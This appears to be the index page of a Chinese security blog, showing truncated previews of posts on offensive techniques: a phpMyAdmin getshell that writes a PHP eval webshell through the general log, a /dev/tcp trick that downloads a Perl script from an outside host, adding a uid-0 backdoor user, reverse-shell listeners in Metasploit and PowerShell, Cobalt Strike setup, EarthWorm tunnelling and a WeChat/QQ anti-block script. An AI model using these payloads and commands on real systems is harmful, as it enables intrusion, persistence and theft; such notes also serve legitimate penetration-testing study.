获取阿里云机器的外网IP

2020年11月14日  No comment

        用于获取 ipconfig 不显示外网IP的机器nslookup myip.opendns.com. resolver1.opendns.com      wget http://members.3322.org/dyndns/getip  curl ip.sb curl ip.cn
阅读全文 »

php实现微信qq防封

2020年05月05日  No comment

<?php function is_weixin_visit() {     if (strpos($_SERVER['HTTP_USER_AGENT'], 'MicroMessenger') !== false) {         return true;
阅读全文 »

安装cobalt strike踩坑记录

2019年11月07日  No comment

安装cobalt strike踩坑记录yum -y installed|grep java                 //检查已安装java版本 yum -y remove java*    //卸载已安装的java&nbs
阅读全文 »

phpmyadmin getshell 记录

2019年09月08日  No comment

    phpmyadmin getshellselect '<?php @eval($_POST[admin])?>'; show global variables like '%general%'; set global general_log = on; set global gen
阅读全文 »

Windows提权辅助工具Windows-Exploit-Suggester

2019年08月14日  No comment

安装               python 3.3.3安装xlrd库 https://pypi.org/project/xlrd/https://www.python.org/ftp/python/3.3.3/python-3.3.3.amd64.msihttps://www.python.org/ftp/python/3.3.3/python-3.3.
阅读全文 »

linux常用渗透小技巧

2019年08月09日  No comment

无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 
阅读全文 »

Nmap常用命令

2019年08月06日  No comment

注:本为是笔记,参考多人的文章,仅供大家学习参考。原作者文章链接:https://www.cnblogs.com/hanxiaobei/p/5603491.htmlhttp://blog.jobbole.com/54595/----------------------------------------------------------------------------nmap是网络扫描和主机检测的工具。用nmap进行信息收集和检测漏洞,功能有:  检测存活主机。  检测主机开放端口(端口发
阅读全文 »

记一次曲折的获取网站路径

2019年07月28日  No comment

            网站php mysql 存在sql注入root权限 跑库的时候表是非常多常见的admin member user manage 都看完了 没有找到需要的数据 只能一个一个重新找  最后发现存在管理员的表的是一个不显眼的表里面,登录到后台发现后台只验证账号不验证密码。       &nb
阅读全文 »

powershell反弹shell 的几种方法

2019年07月20日  No comment

    如果想接收多个sessions的话,用msf执行以下命令进行监听    反弹成功以后,用sessions id 来选择要操作的目标    NC反弹msfconsole use exploit/multi/hanler set payload windows/shell/reverse_tcp set lhost 1
阅读全文 »

EarthWorm详细用法

2019年07月17日  No comment

正向socks v5服务器【适用于目标机器拥有一个外网IP】服务器端执行以下命令ew.exe -s ssocksd -l 888说明:服务器开启端口为888,SOCKS的代理。然后使用sockscap64添加这个IP的代理就可以使用了。-------------------------------------------------------------------------------------------反弹socks v5服务器【适用于目标机器没有公网IP,但可访问内网资源】本地执行
阅读全文 »